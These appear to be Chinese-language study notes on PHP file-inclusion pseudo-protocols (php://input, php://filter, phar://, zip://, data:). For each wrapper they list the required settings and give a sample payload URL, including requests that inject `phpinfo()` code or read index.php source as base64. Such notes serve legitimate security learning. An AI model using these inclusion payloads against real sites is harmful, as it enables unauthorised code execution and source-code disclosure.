伪协议

参考

• https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

php://input

利用条件

​ - allow_url_include = On。 ​ - 对allow_url_fopen不做要求。

index.php
?file=php://input
POST:
<? phpinfo();?>

php://filter

filter的过滤器有很多。

index.php?file=php://filter/read=convert.base64-encode/resource=index.php

phar://

(PHP 5 >= 5.3.0, PHP 7, PECL phar >= 1.0.0)

index.php?file=phar://test.zip/phpinfo.txt

zip://

(PHP 5 >= 5.2.0, PHP 7, PECL zip >= 1.1.0) 绝对路径，编码#

index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt

data:

(php>=php5.2, allow_url_fopen = On, allow_url_include = On)

index.php?file=data:text/plain,<?php phpinfo();?>